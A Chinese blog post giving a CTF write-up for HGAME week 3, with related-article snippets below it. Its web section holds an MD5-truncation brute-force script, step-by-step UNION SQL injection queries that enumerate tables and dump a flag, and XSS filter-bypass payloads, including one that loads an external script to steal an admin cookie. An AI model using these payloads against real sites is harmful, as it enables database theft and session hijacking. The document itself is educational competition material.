hgame week3

最新推荐文章于 2023-04-19 16:16:34 发布
最新推荐文章于 2023-04-19 16:16:34 发布
阅读量580 收藏
点赞数
分类专栏: ctf 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40871137/article/details/87897071
版权

week3-wp

wuerror

web

1.sqli-1

首先写个脚本过code

import hashlib
from multiprocessing.dummy import Pool as ThreadPool

# MD5截断数值已知 求原始数据
# 例子 substr(md5(captcha), 0, 6)=60b7ef|| substr(md5($_GET["code"]),0,4) === cc81
keymd5 = '72e6'   #已知的md5截断值
md5start = 0   # 设置题目已知的截断位置
md5length = 4
def md5(s):  # 计算MD5字符串
    return hashlib.md5(str(s).encode('utf-8')).hexdigest()

def findmd5(sss): # 输入范围 里面会进行md5测试 
    key = sss.split(':') 
    start = int(key[0]) # 开始位置 
    end = int(key[1]) # 结束位置 
    result = 0 
    for i in range(start, end): 
        # print(md5(i)[md5start:md5length]) 
        if md5(i)[0:4] == keymd5: # 拿到加密字符串 
            result = i 
            print(result) # 打印 
            break

list=[]  # 参数列表
for i in range(10):   # 多线程的数字列表 开始与结尾
    list.append(str(10000000*i) + ':' + str(10000000*(i+1)))
pool = ThreadPool()    # 多线程任务
pool.map(findmd5, list) # 函数 与参数列表
pool.close()
pool.join()

?code=xxx&id=0 order by 1||2(测出只有一列,而且没有过滤)

?code=xxx&id=0 union select version() (5.7.24-0ubuntu0.18.04.1。应该是mysql 反正我也只看过这个)

?code=xxx&id=0 union select database() (得到数据库名hgame)

?code=xxx&id=0 union select table_name from information_schema.tables where table_schema=‘hgame’

得到表名

array(1) {
[“word”]=>
string(9) “f1l1l1l1g”
}
array(1) {
[“word”]=>
string(5) “words”
}

这个肯定在f1l1l1l1g了

?code=xxx&id=0 union select group_concat(column_name) from information_schema.columns where table_name=‘f1l1l1l1g’ (可以得到列名。此处要使用group_concat函数将它们连接输出,不然会发现没有报错但输出为空)

[“word”]=>string(10) “f14444444g”

?code=xxx&id=0 union select group_concat(f14444444g) from f1l1l1l1g 得到flag

2.BabyXss

1.<Sc<script>ript>alert(1)</sc</script>riPt>//双写加大小写
2.<iframe onload=alert(/xss/)>

用反射型xss验证成功,题目里说到是窃取管理员的cookie。在网上找了个xss平台,遇到的问题是之前把src写在了alert()的位置,还问了出题人有点尴尬。还换了个平台,第一次用的xss.pt,正确写法也收不到就很迷,卡了很久

<Sc<script>ript src=xss平台提供的链接></sc</script>riPt>

在这里插入图片描述

misc

1.听听音乐

audacity打开,在后面没有声音的部分发现了摩尔斯电码。录下来在线翻译得到(有的网站标点符号不能翻译,要手动)ps:mp3stego会发现出题人的恶意:)

wuerror
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MD5截断比较
Fly_鹏程万里
06-24 3640
ctf中我们经常会碰到用MD5的截断比较做验证,例如:substr(md5($str), 0, 6) === "edef",通过这种方式限制脚本的自动化攻击。对于这种情形我们通常可以写脚本去爆破MD5, 但是花费时间和比较字符串的长度有关,并且花费时间通常比较长,这不利于脚本自动攻击,下面给出爆破脚本和使用方式: submd5.py # -*- coding: utf-8 -*- import multiprocessing import hashlib import random import
CTF-web 第一部分 MD5
iamsongyu的博客
10-08 8527
一. 哈希解密与攻击 哈希就是把任意长度的输入(又叫做预映射pre-image)通过散列算法变换成固定长度的输出,通常用来进行文件摘要或者信息加密。虽说很难具有相同哈希的文件,但是某些特意构造的 信息还是会满足相同的哈希,而且有些时候可以使用字典的方式进行解密和使用哈希攻击。 0x00 SHA $_GET['name'] == $_GET['password'] sha1($_GET['n...
[BJDCTF2020]EasySearch
Sk1y的博客
04-26 379
考查点:源码泄露index.php.swp,SSI注入漏洞,md5值相等的字符串寻找
第一届“百度杯”Upload一次艰难的upload!
u011250160的博客
10-02 421
首先看下题把 打开网站,基本套路,查看源码,除了说fast,没有发现什么有价值的东西
CTF-[Web] MD5解题思路
weixin_54438700的博客
04-19 5455
最近练习了一些CTF中关于md5绕过的题目,总结了几种思路,本质没有太大变化,就是各种组合绕过,也是比较考察基础的,前段时间太摆烂了,好久没有更新了,革命尚未成功,同志仍需努力!!!
vm虚拟机-简单题目(hgame-week4-easyvm、cg-ctf wxyVM1/2
01-08
然后先写了前面的cg-ctf的两个题目,其实当时做的时候还没太大虚拟机的感觉,后面接触到hgame的题目,然后再看的时候就感觉到有些那个意思,但是两个题目是基础题目也就不是太难为人,看成数据处理的考点也做的出来...
HGAME cdcollector-开源
04-24
【标题】"HGAME cdcollector-开源"是一个针对游戏收藏管理者的开源项目,它扩展了原有的cdcollector系统,特别设计用于管理和记录大量的电子游戏数据,尤其是HGAME(可能指的是成人向游戏)的数据库。这个系统利用...
hgame:Haskell 游戏引擎
05-30
3. **数据结构与算法**:游戏引擎中涉及到大量的数据处理,如碰撞检测、物理模拟、图形渲染等,都需要高效的数据结构和算法支持。Haskell的类型系统可以帮助开发者在编译时检查错误,避免运行时的问题。 4. **并发...
0hgame:用0h制作的游戏->阅读README
05-01
)2- DO NOT TOUCH BLACK THINGS IF YOU DONT WANT TO START AGAIN3- Try to reach the other side of the window to became the king of the penguins4- Enjoy it. (it is a rule, so if you are not enjoying the ...
3D模型图片查看器(可查看3D程序模型)
11-03
在游戏领域,尤其是Hgame(成人游戏)中,3D模型的创建和展示是至关重要的,因为它们构成了游戏内的角色和环境。 描述中提到的“Hgame图片模型查看工具”表明这个查看器可能专门针对游戏行业内,特别是成人游戏的3D...
MD5加密+截取字符
05-09
MD5工具类以及截取字符后加密,可用于账号截取字符加密
CTFMD5截断比较
lacoucou的专栏
05-17 1万+
md5 截断验证ctf中经常用MD5的截断比较做验证,如:substr(md5($str), 0, 6) === “3322cf”,通过这种方式限制脚本的自动化攻击。通常可以写脚本去爆破MD5, 但是花费时间和比较字符串的长度有关,并且花费时间通常比较长,这不利于脚本自动攻击,下面给出爆破脚本和使用方式。 submd5.py # -*- coding: utf-8 -*- import mult
i春秋 WEB GetFlag
A_dmin的博客
06-15 1549
i春秋 WEB GetFlag 一天一道CTF题目,能多不能少 打开网页,点击login来到登陆页面: 发现验证码是截取MD5的验证:substr(md5(captcha), 0, 6)=3aab4a 编写脚本来跑验证码: import requests import base64 import sys import hashlib def getMd5(index): for i in r...
第四届宁波赛初赛赛题 wp
pone2233的博客
05-25 1361
Web WEB1 打开页面发现源代码 119.61.19.212:50070/exec.php GET 1必须小于八位 a.py : \#!/usr/bin/python \# -*- coding: UTF-8 -*- import requests url = "http://119.61.19.217:50070/exec.php?1={0}" print("[+]start attack!!!") with open("payload.txt","r") as f: for i in
ctfMD5绕过详细总结及例题[BJDCTF2020]Easy MD5
m0_56691564的博客
10-18 4777
MD5()函数简单了解及ctf中常见绕过技巧,结尾附加例题。
PHP简单的手机验证码验证过程
热门推荐
orangeholic的专栏
09-03 2万+
做过一个需求:广告主后台发起调查活动,普通用户参加此调查后跳转值某个网址领取1Q点(1角钱);上线一段时间以后,广告主反馈得到的很多手机号都是伪造的(我们开始只用正则匹配判断手机号正确与否),然后产品让我们加上手机短信验证,就变成了下面的样子. 刚开始的思路应该很正常的那种,用rand生成随机码,然后存在redis里边,设置expire为60秒;后来考虑考虑,用户为了1角钱不至于如此,需要
MySQL中常见约束与实践
小小默:进无止境
04-28 2884
## 【1】常见约束类型 约束是一种限制,它通过对表的行或列的数据做出限制,来确保表的数据的完整性、唯一性。 ### ① 主键约束 primary key 主键约束相当于`唯一约束+非空约束`的组合,`主键约束列不允许重复,也不允许出现空值`。 每个表最多只允许一个主键,建立主键约束可以在`列级别`创建,也可以在`表级别`创建。 当创建主键的约束时,系统默认会在`所在的列和列组合上建立对应的唯一索引`。 ### ② 外键约束 foreign key 外键约束是保证一个或两个表之间的参照完整性,外键是构
MD5中的缺位问题
m0_37402080的博客
05-10 1034
refer  http://www.cnblogs.com/healer007/p/5062189.html http://www.cnblogs.com/qingtianoye/p/3523719.html 32位MD5加密算法代码 /// /// 32位MD5加密 /// /// /// public static string MD5Encrypt32(str
请你完善上面的代码 添加从E:\Desktop\2024hgame\week1\crypto\奇怪的图片\png_out文件夹里面获取图片的功能
最新发布
02-04
以下是完善代码的示例,添加了从指定文件夹获取图片的功能: ```python import os from PIL import Image def get_images_from_folder(folder_path): images = [] for filename in os.listdir(folder_path): if filename.endswith(".png"): image_path = os.path.join(folder_path, filename) image = Image.open(image_path) images.append(image) return images # 指定文件夹路径 folder_path = "E:/Desktop/2024hgame/week1/crypto/奇怪的图片/png_out" # 获取文件夹中的图片 images = get_images_from_folder(folder_path) # 在代码中使用获取到的图片 # ... ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值